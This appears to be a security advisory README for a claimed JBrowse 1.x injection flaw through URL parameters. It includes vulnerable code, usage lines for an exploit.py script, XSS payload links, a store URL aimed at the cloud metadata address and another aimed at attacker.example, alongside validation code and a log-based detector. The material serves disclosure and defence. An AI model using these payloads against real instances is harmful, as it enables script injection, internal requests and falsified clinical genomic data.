jabir-dev/CVE-2026-JBrowse-Injection
# CVE-2026-XXXXX: JBrowse Configuration Injection via URL Parameters
## Overview
| Field | Value |
|-------|-------|
| **Product** | JBrowse |
| **Vendor** | GMOD |
| **Versions** | 1.0 through 1.16.11 (all 1.x versions) |
| **Type** | Code Injection (CWE-94) / XSS (CWE-79) / SSRF (CWE-918) |
| **CVSS 4.0** | 8.6 High |
| **Impact** | XSS / SSRF / Data Exfiltration / Clinical Data Manipulation |
| **bio.tools** | https://bio.tools/jbrowse |
## Vulnerability
JBrowse reads several URL query parameters and passes each one straight to `JSON.parse()`; the resulting objects are merged into the live configuration without any validation or sanitization:

```javascript
// src/JBrowse/main.js:85-106
if (queryParams.addFeatures) {
    config.stores.url.features = JSON.parse(queryParams.addFeatures) // NO VALIDATION
}
if (queryParams.addTracks) {
    config.tracks = JSON.parse(queryParams.addTracks) // NO VALIDATION
}
if (queryParams.addBookmarks) {
    config.bookmarks.features = JSON.parse(queryParams.addBookmarks) // NO VALIDATION
}
if (queryParams.addStores) {
    config.stores = JSON.parse(queryParams.addStores) // NO VALIDATION
}
```

`JSON.parse()` itself executes nothing. The problem is that whatever object it returns becomes the track, store, feature or bookmark configuration, so whoever crafts the link decides which URLs the victim's browser fetches and which strings it renders into the page.
Combined with the CORS wildcard in `.htaccess`:

```apache
Header onsuccess set Access-Control-Allow-Origin *
```

The wildcard is not what makes the injection work (a crafted link needs no CORS at all); it allows a page on any origin to read, through the victim's browser, data files served from the JBrowse host.
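The unvalidated merge above, beside a hardened version that validates each parsed object before it reaches the configuration. This is an added example written for this page, not JBrowse's own code: the allowlists of track and store types, the label character class, the `applyVulnerable` / `applyHardened` names and the sample links are assumptions chosen for illustration.

```javascript
// Added example (not JBrowse's own code): README's unvalidated merge next to a
// validating version. Allowlists, SAFE_LABEL and the sample links are assumed.

// Track and store types this deployment is willing to instantiate (assumed).
const ALLOWED_TRACK_TYPES = new Set(["FeatureTrack", "CanvasFeatures", "SequenceTrack"]);
const ALLOWED_STORE_TYPES = new Set(["JBrowse/Store/SeqFeature/NCList", "JBrowse/Store/SeqFeature/BigWig"]);
// Labels, keys, names and seq_ids: no markup, no quotes, bounded length.
const SAFE_LABEL = /^[A-Za-z0-9 _.\-]{1,64}$/;

function parseQuery(search) {
  const params = {};
  for (const [k, v] of new URLSearchParams(search)) params[k] = v;
  return params;
}

// Mirrors the main.js logic quoted above: whatever parses becomes the config.
function applyVulnerable(config, queryParams) {
  if (queryParams.addFeatures) config.stores.url.features = JSON.parse(queryParams.addFeatures);
  if (queryParams.addTracks) config.tracks = JSON.parse(queryParams.addTracks);
  if (queryParams.addStores) config.stores = JSON.parse(queryParams.addStores);
  return config;
}

// Only same-origin relative paths: no scheme, no protocol-relative prefix, no traversal.
function isSafeRelativeUrl(u) {
  if (typeof u !== "string" || u.length === 0 || u.length > 512) return false;
  if (/^[a-z][a-z0-9+.\-]*:/i.test(u)) return false;          // http:, javascript:, data:, ...
  if (u.startsWith("//") || u.startsWith("\\")) return false;  // //attacker.example/...
  return !u.split(/[\\/]/).includes("..");                     // no ".." path segment
}

const isSafeString = (s) => typeof s === "string" && SAFE_LABEL.test(s);
const isObject = (o) => o !== null && typeof o === "object" && !Array.isArray(o);

function validateFeature(f) {
  return isObject(f) && isSafeString(f.seq_id)
    && Number.isInteger(f.start) && Number.isInteger(f.end) && f.start >= 0 && f.end >= f.start
    && (f.name === undefined || isSafeString(f.name))
    && (f.type === undefined || isSafeString(f.type));
}

function validateTrack(t) {
  return isObject(t) && isSafeString(t.label) && ALLOWED_TRACK_TYPES.has(t.type)
    && isSafeString(t.store) && (t.key === undefined || isSafeString(t.key));
}

function validateStore(s) {
  return isObject(s) && ALLOWED_STORE_TYPES.has(s.type)
    && (s.urlTemplate === undefined || isSafeRelativeUrl(s.urlTemplate))
    && (s.baseUrl === undefined || isSafeRelativeUrl(s.baseUrl));
}

// Parse, then refuse the whole parameter if any element fails validation.
function parseValidated(raw, what, validate, { asMap = false, maxLen = 8192 } = {}) {
  if (raw.length > maxLen) throw new Error(`${what}: parameter too long`);
  let parsed;
  try { parsed = JSON.parse(raw); } catch { throw new Error(`${what}: not valid JSON`); }
  if (asMap) {
    if (!isObject(parsed)) throw new Error(`${what}: expected a JSON object`);
    for (const [name, item] of Object.entries(parsed)) {
      if (!isSafeString(name) || !validate(item)) throw new Error(`${what}.${name}: rejected by validation`);
    }
  } else {
    if (!Array.isArray(parsed)) throw new Error(`${what}: expected a JSON array`);
    const bad = parsed.findIndex((item) => !validate(item));
    if (bad !== -1) throw new Error(`${what}[${bad}]: rejected by validation`);
  }
  return parsed;
}

function applyHardened(config, queryParams) {
  if (queryParams.addFeatures) config.stores.url.features = parseValidated(queryParams.addFeatures, "addFeatures", validateFeature);
  if (queryParams.addTracks) config.tracks = parseValidated(queryParams.addTracks, "addTracks", validateTrack);
  // Merge rather than replace, so the built-in "url" store survives.
  if (queryParams.addStores) Object.assign(config.stores, parseValidated(queryParams.addStores, "addStores", validateStore, { asMap: true }));
  return config;
}

// Constructed sample links (the markup payload is an assumption; the README's own was not preserved).
const XSS_QUERY = "?addTracks=" + encodeURIComponent('[{"label":"test","key":"<img src=x onerror=alert(1)>","type":"FeatureTrack","store":"url"}]');
const FEATURE_QUERY = "?addFeatures=" + encodeURIComponent('[{"seq_id":"ctgA","start":1000,"end":5000,"name":"INJECTED_FAKE_VARIANT","type":"mRNA"}]');
const STORE_QUERY = "?addStores=" + encodeURIComponent('{"meta":{"type":"JBrowse/Store/SeqFeature/NCList","urlTemplate":"http://169.254.169.254/latest/meta-data/"}}');
const freshConfig = () => ({ stores: { url: {} }, tracks: [] });
```

Rejecting markup in labels is defence in depth; the rendering code must still HTML-encode every configuration string it writes into the DOM, and the URL check is what keeps store fetches on the JBrowse origin.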
## Impact
### 1. Cross-Site Scripting (XSS)
Inject HTML/JavaScript via track names, feature attributes, or bookmarks.
### 2. Server-Side Request Forgery (SSRF)
Configure stores so that the browser fetches internal resources (cloud instance metadata, internal APIs). JBrowse 1.x is a client-side application, so these requests are issued by the victim's browser rather than by the JBrowse server: they reach only what the victim's network position allows, and the injected configuration can read the response only where the target permits cross-origin reads.
### 3. Clinical Data Manipulation
Inject fake pathogenic variants into clinical genomics JBrowse instances, potentially leading to incorrect patient diagnoses.
### 4. Data Exfiltration
Redirect data fetches to attacker-controlled servers.
## Usage

```bash
# Check if target is vulnerable
python3 exploit.py --target http://jbrowse.example.com --mode check
# Generate XSS payloads
python3 exploit.py --target http://jbrowse.example.com --mode xss
# Generate SSRF payloads
python3 exploit.py --target http://jbrowse.example.com --mode ssrf
# Clinical data phishing
python3 exploit.py --target http://jbrowse.example.com --mode phish
# Data exfiltration
python3 exploit.py --target http://jbrowse.example.com --mode exfil
```
### Quick Manual Test
Open in browser:

```
http://jbrowse.example.com/?data=sample_data/json/volvox&addTracks=[{"label":"test","key":"
","type":"FeatureTrack","store":"url"}]
```
## Root Cause
1. **No input validation** on the `addFeatures`, `addTracks`, `addStores` and `addBookmarks` URL parameters
2. **CORS wildcard** (`Access-Control-Allow-Origin: *`) lets any origin read data served by the JBrowse host
3. **No CSP headers**, so injected inline script runs
4. **No authentication** on any JBrowse functionality
## Confirmed Test Results
### Test 1: Data Injection
- **URL**: `?addFeatures=[{"seq_id":"ctgA","start":1000,"end":5000,"name":"INJECTED_FAKE_VARIANT","type":"mRNA"}]`
- **Result**: Fake mRNA feature rendered with full DNA sequence in browser
- **Status**: **CONFIRMED**
### Test 2: XSS via Feature Name
- **URL**: `?addFeatures=[{"seq_id":"ctgA","start":2000,"end":4000,"name":"
","type":"mRNA"}]`
- **Result**: JavaScript alert() popup executed when clicking on feature
- **Status**: **CONFIRMED**
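For the blue team, a small log check that flags requests carrying the four injection parameters and raises the severity when a value contains markup or points a store at an external or internal host. This is an added example for this page, not part of the repository; the access-log lines are constructed here to mirror the tests above, and the private-host pattern and severity labels are assumptions.

```javascript
// Added example (not from the repository): scan combined-format access logs
// for JBrowse config-injection parameters. Sample log lines are constructed.

const INJECTION_PARAMS = new Set(["addFeatures", "addTracks", "addStores", "addBookmarks"]);
// Link-local (cloud metadata), loopback and RFC 1918 ranges; assumed set.
const PRIVATE_HOST = /^(169\.254\.|127\.|10\.|192\.168\.|172\.(1[6-9]|2\d|3[01])\.|localhost$)/i;

// Minimal parser for the Apache/NGINX "combined" log format.
function parseAccessLine(line) {
  const m = /^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3}) \S+ "([^"]*)" "([^"]*)"/.exec(line);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]), referer: m[6], ua: m[7] };
}

// Alerts for one request target. URLSearchParams percent-decodes the values once.
function analyzeTarget(target) {
  const q = target.indexOf("?");
  if (q === -1) return [];
  const alerts = [];
  for (const [name, value] of new URLSearchParams(target.slice(q + 1))) {
    if (!INJECTION_PARAMS.has(name)) continue;
    alerts.push({ severity: "info", message: `${name} supplied in URL` });
    if (/<|javascript:|\bon\w+\s*=/i.test(value)) {
      alerts.push({ severity: "high", message: `${name}: HTML/script in config value` });
    }
    // Any absolute or protocol-relative URL inside the JSON means a store was pointed off-origin.
    for (const m of value.matchAll(/(?:[a-z]+:)?\/\/([^/"'\s?#]+)/gi)) {
      const host = m[1].split("@").pop().replace(/:\d+$/, "");
      const kind = PRIVATE_HOST.test(host) ? "internal" : "external";
      alerts.push({ severity: "high", message: `${name}: store URL targets ${kind} host ${host}` });
    }
  }
  return alerts;
}

function analyzeLog(lines) {
  const hits = [];
  for (const line of lines) {
    const req = parseAccessLine(line);
    if (!req) continue;
    for (const a of analyzeTarget(req.target)) hits.push({ ip: req.ip, time: req.time, ...a });
  }
  return hits;
}

// Constructed sample log: a normal request, a benign addTracks, then the
// README's two tests and a store redirected to an attacker host.
const enc = encodeURIComponent;
const logLine = (ip, sec, query) =>
  `${ip} - - [10/Mar/2026:12:00:${sec} +0000] "GET /jbrowse/?${query} HTTP/1.1" 200 5120 "-" "Mozilla/5.0"`;
const SAMPLE_LOG = [
  logLine("203.0.113.5", "01", "data=sample_data/json/volvox&loc=ctgA:1..5000"),
  logLine("203.0.113.5", "02", "data=sample_data/json/volvox&addTracks=" + enc('[{"label":"mine","type":"FeatureTrack","store":"url"}]')),
  logLine("198.51.100.7", "03", "data=sample_data/json/volvox&addFeatures=" + enc('[{"seq_id":"ctgA","start":2000,"end":4000,"name":"<img src=x onerror=alert(1)>","type":"mRNA"}]')),
  logLine("198.51.100.7", "04", "addStores=" + enc('{"x":{"type":"JBrowse/Store/SeqFeature/NCList","urlTemplate":"http://169.254.169.254/latest/meta-data/"}}')),
  logLine("198.51.100.7", "05", "addStores=" + enc('{"x":{"type":"JBrowse/Store/SeqFeature/NCList","urlTemplate":"https://attacker.example/t/{refseq}.json"}}')),
];
```

Legitimate users do share links with `addTracks`, so the bare presence of a parameter is logged at `info`; only markup or an off-origin store URL is worth paging on. Run `analyzeLog(SAMPLE_LOG)` to see the five-line sample produce four `info` and three `high` alerts.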
## Disclaimer
For **authorized security testing** and **educational purposes** only.
## License
MIT